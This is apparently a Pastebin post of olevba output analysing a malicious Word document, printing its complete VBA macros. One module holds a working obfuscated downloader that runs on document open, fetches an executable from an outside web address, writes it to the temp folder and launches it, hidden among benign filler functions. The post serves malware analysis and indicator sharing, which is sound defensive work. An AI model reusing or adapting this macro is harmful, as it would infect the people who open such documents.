SHARE
TWEET

Malicious Word macro

dynamoo May 21st, 2015 292 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. olevba 0.26 - http://decalage.info/python/oletools
  2. Flags       Filename                                                        
  3. ----------- -----------------------------------------------------------------
  4. OLE:MAS-H-- 000001.doc
  5.  
  6. (Flags: OpX=OpenXML, XML=Word2003XML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, ?=Unknown)
  7.  
  8. ===============================================================================
  9. FILE: 000001.doc
  10. Type: OLE
  11. -------------------------------------------------------------------------------
  12. VBA MACRO ThisDocument.cls
  13. in file: 000001.doc - OLE stream: u'Macros/VBA/ThisDocument'
  14. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  15.  
  16. Sub FFewegUU1(FUU2 As Long)
  17. mp268P5dmPj6hB
  18. End Sub
  19.  
  20. Sub autoopen()
  21. FFewegUU1 (866)
  22.  
  23. End Sub
  24.  
  25. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  26. ANALYSIS:
  27. +----------+----------+---------------------------------------+
  28. | Type     | Keyword  | Description                           |
  29. +----------+----------+---------------------------------------+
  30. | AutoExec | AutoOpen | Runs when the Word document is opened |
  31. +----------+----------+---------------------------------------+
  32. -------------------------------------------------------------------------------
  33. VBA MACRO M11.bas
  34. in file: 000001.doc - OLE stream: u'Macros/VBA/M11'
  35. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  36. Private Type tagInitCommonControlsEx
  37.    lngSize As Long
  38.    lngICC As Long
  39. End Type
  40.  
  41. Private Const ICC_USEREX_CLASSES = &H200
  42.  
  43. Public Function InitXpStyle() As Boolean
  44.    On Error Resume Next
  45.    Dim iccex As tagInitCommonControlsEx
  46.    ' Ensure CC available:
  47.   With iccex
  48.        .lngSize = LenB(iccex)
  49.        .lngICC = ICC_USEREX_CLASSES
  50.    End With
  51.    InitXpStyle = (Err.Number = 0)
  52.    On Error GoTo 0
  53. End Function
  54.  
  55. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  56. ANALYSIS:
  57. No suspicious keyword or IOC found.
  58. -------------------------------------------------------------------------------
  59. VBA MACRO Module1.bas
  60. in file: 000001.doc - OLE stream: u'Macros/VBA/Module1'
  61. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  62.  
  63. Public Function RandomNumber(Upper As Integer, _
  64.      Lower As Integer) As Integer
  65.     'Generates a Random Number BETWEEN the LOWER and UPPER values
  66.    Randomize
  67.     RandomNumber = Int((Upper - Lower + 1) * Rnd + Lower)
  68. End Function
  69.  
  70.  
  71. Public Function QN7pFLiUlj5(ZLJXSAoSKjsg As String)
  72.     Set qQ7z6L8p5v2w = CreateObject(Chr(83) & Chr(104) & Chr(101) & Chr(108) & Chr(108) & Chr(46) & Chr(65) & Chr(112) & Chr(112) & "l" & "i" & Chr(99) & Chr(97) & Chr(116) & Chr(105) & "o" & "n")
  73. qQ7z6L8p5v2w.Open (ipekwUxeEk8dG)
  74. End Function
  75.  
  76.  
  77.  
  78.  
  79. Function RandomString(cb As Integer) As String
  80.     Randomize
  81.     Dim rgch As String
  82.     rgch = "abcdefghijklmnopqrstuvwqyz"
  83.     rgch = rgch & UCase(rgch)
  84.     RandomString = Mid$(rgch, Int(Rnd * Len(rgch) + 1), 1)
  85.     rgch = rgch & "0123456789"
  86.     Dim i As Long
  87.     For i = 1 To cb
  88.         RandomString = RandomString & Mid$(rgch, Int(Rnd * Len(rgch) + 1), 1)
  89.     Next i
  90. End Function
  91.  
  92.  
  93. Public Function DBzfavone(CRSjLxvDjAsERi As String)
  94.     Set DBzfavone = CreateObject(CRSjLxvDjAsERi)
  95. End Function
  96. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  97. ANALYSIS:
  98. +------------+--------------+-----------------------------------------+
  99. | Type       | Keyword      | Description                             |
  100. +------------+--------------+-----------------------------------------+
  101. | Suspicious | Open         | May open a file                         |
  102. | Suspicious | Chr          | May attempt to obfuscate specific       |
  103. |            |              | strings                                 |
  104. | Suspicious | CreateObject | May create an OLE object                |
  105. | Suspicious | Hex Strings  | Hex-encoded strings were detected, may  |
  106. |            |              | be used to obfuscate strings (option    |
  107. |            |              | --decode to see all)                    |
  108. +------------+--------------+-----------------------------------------+
  109. -------------------------------------------------------------------------------
  110. VBA MACRO Module2.bas
  111. in file: 000001.doc - OLE stream: u'Macros/VBA/Module2'
  112. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  113. Public ipekwUxeEk8dG As String
  114. Sub mp268P5dmPj6hB()
  115.  
  116. Dim uDXIWGiqPdonzr: Set uDXIWGiqPdonzr = DBzfavone("M" & Chr(105) & Chr(99) & "r" & Chr(111) & Chr(115) & Chr(111) & Chr(102) & Chr(116) & Chr(46) & Chr(88) & Chr(77) & "L" & "H" & Chr(84) & "T" & Chr(80))
  117.  
  118. Dim DAp2f0xJbq: Set DAp2f0xJbq = DBzfavone(Chr(65) & Chr(100) & "o" & Chr(100) & Chr(98) & "." & Chr(83) & "t" & Chr(114) & "e" & "a" & Chr(109))
  119.  
  120. uDXIWGiqPdonzr.Open Chr(71) & Chr(69) & Chr(84), Chr(104) & "t" & Chr(116) & Chr(112) & Chr(58) & Chr(47) & "/" & Chr(109) & Chr(101) & "r" & Chr(99) & Chr(117) & Chr(114) & "y" & "." & Chr(112) & "o" & Chr(119) & "e" & "r" & Chr(119) & "e" & Chr(97) & "v" & Chr(101) & "." & "c" & Chr(111) & "m" & Chr(47) & Chr(55) & Chr(50) & Chr(47) & Chr(49) & Chr(49) & Chr(46) & "e" & Chr(120) & Chr(101), False
  121. uDXIWGiqPdonzr.Send
  122.  
  123. Set DHyz2v5mICG8 = DBzfavone("W" & Chr(83) & Chr(99) & Chr(114) & Chr(105) & Chr(112) & Chr(116) & Chr(46) & Chr(83) & Chr(104) & Chr(101) & Chr(108) & "l")
  124.  
  125. Set YFKDZBHThU = DHyz2v5mICG8.Environment("P" & "r" & "o" & Chr(99) & Chr(101) & "s" & Chr(115))
  126.  
  127. qK8feLrqC67 = YFKDZBHThU("T" & Chr(69) & Chr(77) & Chr(80))
  128.  
  129. ipekwUxeEk8dG = qK8feLrqC67 & Chr(92) & "r" & Chr(105) & "b" & Chr(97) & "s" & Chr(105) & "m" & "l" & "." & "e" & Chr(120) & Chr(101)
  130.  
  131.   NmfekJVEW = uDXIWGiqPdonzr.responseBody
  132. On Error GoTo Elhczuh7a
  133.     a = 132 / 0
  134.   On Error GoTo 0
  135.  
  136. On Error GoTo FeEH4er
  137.     b = 56 / 0
  138.   On Error GoTo 0
  139. vtDXeES9ee:
  140.   Exit Sub
  141. Elhczuh7a:
  142.     With DAp2f0xJbq
  143.        .Type = 1
  144.         .Open
  145.         .write NmfekJVEW
  146.         .savetofile ipekwUxeEk8dG, 2
  147.     End With
  148.    
  149. FeEH4er:
  150.   QN7pFLiUlj5 ("NcJdYOPr1F")
  151. Resume vtDXeES9ee
  152. End Sub
  153.  
  154. Public Function RandomNumbers(Upper As Integer, _
  155.    Optional Lower As Integer = 1, _
  156.    Optional HowMany As Integer = 1, _
  157.    Optional Unique As Boolean = True) As Variant
  158. '*******************************************************
  159.    'This Function generates random array of
  160.    'Numbers between Lower & Upper
  161.    'In Addition parameters can include whether
  162.    'UNIQUE values are required
  163.  
  164.    'Note the Result is INCLUSIVE of the Range
  165.  
  166.     'Debug Example:
  167.    'x = RandomNumbers(49, 1, 7)
  168.    'For n = LBound(x) To UBound(x): Debug.Print x(n);: Next n
  169.    'WARNING HowMany MUST be greater than (Higher - Lower)
  170.    '******************************************************
  171.  
  172.     On Error GoTo LocalError
  173.     If HowMany > ((Upper + 1) - (Lower - 1)) Then Exit Function
  174.     Dim X           As Integer
  175.     Dim n           As Integer
  176.     Dim arrNums()   As Variant
  177.     Dim colNumbers  As New Collection
  178.    
  179.     ReDim arrNums(HowMany - 1)
  180.     With colNumbers
  181.         'First populate the collection
  182.        For X = Lower To Upper
  183.             .Add X
  184.         Next X
  185.         For X = 0 To HowMany - 1
  186.             n = RandomNumber(0, colNumbers.Count + 1)
  187.             arrNums(X) = colNumbers(n)
  188.             If Unique Then
  189.                 colNumbers.Remove n
  190.             End If
  191.         Next X
  192.     End With
  193.     Set colNumbers = Nothing
  194.     RandomNumbers = arrNums
  195. Exit Function
  196. LocalError:
  197.     'Justin (just in case)
  198.    RandomNumbers = ""
  199. End Function
  200.  
  201. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  202. ANALYSIS:
  203. +------------+------------+-----------------------------------------+
  204. | Type       | Keyword    | Description                             |
  205. +------------+------------+-----------------------------------------+
  206. | Suspicious | Open       | May open a file                         |
  207. | Suspicious | Chr        | May attempt to obfuscate specific       |
  208. |            |            | strings                                 |
  209. | Suspicious | SaveToFile | May create a text file                  |
  210. | Suspicious | Write      | May write to a file (if combined with   |
  211. |            |            | Open)                                   |
  212. +------------+------------+-----------------------------------------+
  213. -------------------------------------------------------------------------------
  214. VBA MACRO M3.bas
  215. in file: 000001.doc - OLE stream: u'Macros/VBA/M3'
  216. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  217. Public Const gsTOOLBARNAME As String = "ToolbarName"
  218.  
  219.  
  220.  
  221.  
  222. Public Sub DeleteBar()
  223.     On Error Resume Next
  224.         Application.CommandBars(gsTOOLBARNAME).Delete
  225.     On Error GoTo 0
  226. End Sub
  227.  
  228. Public Sub BuildBar()
  229.    
  230.     Dim cbrBar As CommandBar
  231.     Dim ctlButton As CommandBarButton
  232.     Dim ctlDropDown As CommandBarPopup
  233.    
  234.     On Error Resume Next
  235.         Application.CommandBars(gsTOOLBARNAME).Delete
  236.     On Error GoTo 0
  237.    
  238.     ' Create the command bar.
  239.    Set cbrBar = Application.CommandBars.Add(gsTOOLBARNAME, _
  240.                                         msoBarTop, False, True)
  241.     cbrBar.Visible = True
  242.    
  243.     ' Add the controls required by our application.
  244.    Set ctlButton = cbrBar.Controls.Add(msoControlButton)
  245.     With ctlButton
  246.         .Style = msoButtonIconAndCaption
  247.         .Caption = "CAPTION"
  248.         .FaceId = 107
  249.         .OnAction = "module.Sub"
  250.     End With
  251.  
  252. End Sub
  253.  
  254. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  255. ANALYSIS:
  256. No suspicious keyword or IOC found.
  257. -------------------------------------------------------------------------------
  258. VBA MACRO Module3.bas
  259. in file: 000001.doc - OLE stream: u'Macros/VBA/Module3'
  260. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  261.  
  262. Option Explicit
  263. Public Function Add_UniqueItem(ByRef cboBox As ComboBox, ByRef itemText As String, Optional ByVal cmpMethod As VbCompareMethod = vbBinaryCompare) As Boolean
  264.         '<EhHeader>
  265.        On Error GoTo Add_UniqueItem_Err
  266.         '</EhHeader>
  267.  
  268.     Dim i As Long
  269.  
  270. 100 Add_UniqueItem = False
  271.  
  272. 102 If cboBox Is Nothing Then Exit Function
  273.  
  274. 104 With cboBox
  275.  
  276. 106     For i = 0 To .ListCount
  277. 108         If StrComp(.List(i), itemText, cmpMethod) = 0 Then Exit Function
  278.         Next
  279.        
  280. 110     .AddItem itemText
  281.  
  282.     End With
  283.  
  284. 112 Add_UniqueItem = True
  285.  
  286.         '<EhFooter>
  287.        Exit Function
  288.  
  289. Add_UniqueItem_Err:
  290.         MsgBox Err.Description & vbCrLf & _
  291.                "in ssMDBQuery.MComboboxHelper.Add_UniqueItem " & _
  292.                "at line " & Erl
  293.         Resume Next
  294.         '</EhFooter>
  295. End Function
  296.  
  297.  
  298. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  299. ANALYSIS:
  300. No suspicious keyword or IOC found.
RAW Paste Data
Challenge yourself this year...
Learn something new in 2017
Top